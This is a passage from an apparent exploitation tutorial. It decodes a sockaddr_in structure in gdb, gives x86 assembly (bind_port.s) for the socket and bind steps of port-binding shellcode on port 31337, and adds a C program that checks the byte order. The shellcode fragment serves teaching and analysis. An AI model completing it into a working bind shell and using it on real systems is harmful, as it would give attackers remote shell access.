$2 = 16
(gdb) x/16xb &host_addr
0xbffff780: 0x02 0x00 0x7a 0x69 0x00 0x00 0x00 0x00
0xbffff788: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) p /x 27002
$3 = 0x697a
(gdb) p 0x7a69
$4 = 31337
(gdb)
The next breakpoint happens after the sockaddr structure is filled with
values. The debugger is smart enough to decode the elements of the structure
when host_addr is printed, but now you need to be smart enough to realize the
port is stored in network byte order (big-endian). The two bytes 0x7a 0x69 at
offset 2 are 31337 (0x7a69) written high byte first; read as a native
little-endian word, the way gdb's p host_addr does on x86, they come out as
0x697a = 27002, which is exactly what the two p commands above confirm. The
sin_family and sin_port elements are both words, followed by the address as a
DWORD. In this case, the address is 0 (INADDR_ANY), which means the socket can
be bound on any local address. The remaining eight bytes after that are just
padding in the structure. The first eight bytes (the first line of the x/16xb
dump above) contain all the important information.
The following assembly instructions perform the socket calls needed
to bind to port 31337 and accept TCP connections. The sockaddr structure and
each argument array are created by pushing values onto the stack in reverse
order and then copying ESP into ECX, so ECX points at the start of the block
just built. The last eight bytes of the sockaddr structure aren't actually
pushed to the stack, since the kernel ignores them. Whatever eight bytes
happen to be on the stack already will occupy this space, which is fine.
bind_port.s
BITS 32
; s = socket(2, 1, 0)
push BYTE 0x66 ; socketcall is syscall #102 (0x66).
pop eax
cdq ; Sign-extend eax (0x66, positive) into edx: edx = 0, a null DWORD for later.
xor ebx, ebx ; ebx is the type of socketcall.
inc ebx ; 1 = SYS_SOCKET = socket()
push edx ; Build arg array: { protocol = 0,
push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1,
push BYTE 0x2 ; AF_INET = 2 }
mov ecx, esp ; ecx = ptr to argument array
int 0x80 ; After syscall, eax has socket file descriptor.
mov esi, eax ; save socket FD in esi for later
; bind(s, [2, 31337, 0], 16)
push BYTE 0x66 ; socketcall (syscall #102)
pop eax
inc ebx ; ebx = 2 = SYS_BIND = bind()
push edx ; Build sockaddr struct: INADDR_ANY = 0
push WORD 0x697a ; (in reverse order) PORT = 31337 (0x7a69); the little-endian push stores bytes 7a 69, i.e. network byte order
push WORD bx ; AF_INET = 2 (ebx is still 2)
mov ecx, esp ; ecx = server struct pointer
push BYTE 16 ; Build arg array: { sizeof(struct sockaddr_in) = 16,
push ecx ; (in reverse) server struct pointer,
push esi ; socket file descriptor }
mov ecx, esp ; ecx = ptr to argument array
int 0x80 ; eax = 0 on success
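The byte-order point above is easy to get backwards when hand-packing a sockaddr, so here is an added C example (not the book's code) that does the same packing the shellcode's three pushes do, reads the fields back out of the gdb dump, and cross-checks the result against libc's own struct sockaddr_in with htons()/htonl(). The 16 dump bytes are constructed from the x/16xb output above; the program assumes the little-endian i386 layout the shellcode targets (sizeof(struct sockaddr_in) == 16, sin_family in host order at offset 0, sin_port in network order at offset 2). Function names such as pack_sockaddr_in and push_word_for_port are this example's own.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>

/* Constructed input: the 16 bytes that x/16xb &host_addr printed above. */
static const uint8_t host_addr_dump[16] = {
    0x02, 0x00, 0x7a, 0x69, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};

/* Field readers for a raw struct sockaddr_in image (little-endian i386 layout):
 *   bytes 0-1 sin_family (host order), 2-3 sin_port (network order),
 *   4-7 sin_addr (network order), 8-15 sin_zero (ignored by the kernel). */
uint16_t sockaddr_family(const uint8_t in[16])
{
    return (uint16_t)(in[0] | (in[1] << 8));
}

uint16_t sockaddr_port(const uint8_t in[16])
{
    return (uint16_t)((in[2] << 8) | in[3]);      /* high byte first */
}

/* Reading sin_port as a native little-endian word is what gdb's
 * `p host_addr` did on x86: 0x697a = 27002 instead of 31337. */
uint16_t sockaddr_port_misread(const uint8_t in[16])
{
    return (uint16_t)(in[2] | (in[3] << 8));
}

uint32_t sockaddr_addr(const uint8_t in[16])
{
    return ((uint32_t)in[4] << 24) | ((uint32_t)in[5] << 16) |
           ((uint32_t)in[6] << 8)  |  (uint32_t)in[7];
}

/* Lay the structure out by hand the way the three pushes in bind_port.s do,
 * except that sin_zero is cleared here instead of left as stack garbage. */
void pack_sockaddr_in(uint8_t out[16], uint16_t port, uint32_t addr)
{
    memset(out, 0, 16);
    out[0] = (uint8_t)(AF_INET & 0xff);   /* push WORD bx: 2 in host order */
    out[1] = (uint8_t)(AF_INET >> 8);
    out[2] = (uint8_t)(port >> 8);        /* push WORD 0x697a -> bytes 7a 69 */
    out[3] = (uint8_t)(port & 0xff);
    out[4] = (uint8_t)(addr >> 24);       /* push edx: INADDR_ANY = 0 */
    out[5] = (uint8_t)(addr >> 16);
    out[6] = (uint8_t)(addr >> 8);
    out[7] = (uint8_t)(addr & 0xff);
}

/* The immediate for `push WORD` so the bytes land in network order on a
 * little-endian CPU: swap the two bytes of the port, 31337 -> 0x697a. */
uint16_t push_word_for_port(uint16_t port)
{
    return (uint16_t)((port >> 8) | (port << 8));
}

/* The socketcall(SYS_BIND) argument array. The shellcode pushes 16, then the
 * struct pointer, then the fd, so memory holds { fd, ptr, 16 } in that order.
 * uint32_t stands in for the 32-bit registers and pointers of i386. */
void bind_args_i386(uint32_t out[3], uint32_t fd, uint32_t sockaddr_ptr)
{
    out[0] = fd;            /* push esi: last push, lowest address */
    out[1] = sockaddr_ptr;  /* push ecx */
    out[2] = 16;            /* push BYTE 16: first push, highest address */
}

/* 1 if the hand-packed bytes equal the gdb dump above. */
int pack_matches_dump(uint16_t port, uint32_t addr)
{
    uint8_t mine[16];
    pack_sockaddr_in(mine, port, addr);
    return memcmp(mine, host_addr_dump, 16) == 0;
}

/* 1 if the hand-packed bytes equal what libc's struct and htons()/htonl()
 * produce; this is the check that the shellcode's fixed byte order is right. */
int pack_matches_libc(uint16_t port, uint32_t addr)
{
    struct sockaddr_in sin;
    uint8_t mine[16];
    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(port);
    sin.sin_addr.s_addr = htonl(addr);
    pack_sockaddr_in(mine, port, addr);
    return sizeof sin == 16 && memcmp(&sin, mine, 16) == 0;
}

int main(void)
{
    uint32_t args[3];
    printf("family=%u port=%u (misread as %u) addr=0x%08x\n",
           sockaddr_family(host_addr_dump), sockaddr_port(host_addr_dump),
           sockaddr_port_misread(host_addr_dump), sockaddr_addr(host_addr_dump));
    printf("push WORD 0x%04x ; PORT = %u\n", push_word_for_port(31337), 31337);
    bind_args_i386(args, 3, 0xbffff780);
    printf("bind args in memory: { %u, 0x%08x, %u }\n", args[0], args[1], args[2]);
    printf("matches dump: %d, matches libc: %d\n",
           pack_matches_dump(31337, INADDR_ANY), pack_matches_libc(31337, INADDR_ANY));
    return 0;
}
```

Compile with cc -o sockaddr_check sockaddr_check.c and run it on an x86 box; if pack_matches_libc() ever reports 0, the hand-rolled byte order (and therefore the shellcode's push WORD immediate) is wrong for that target.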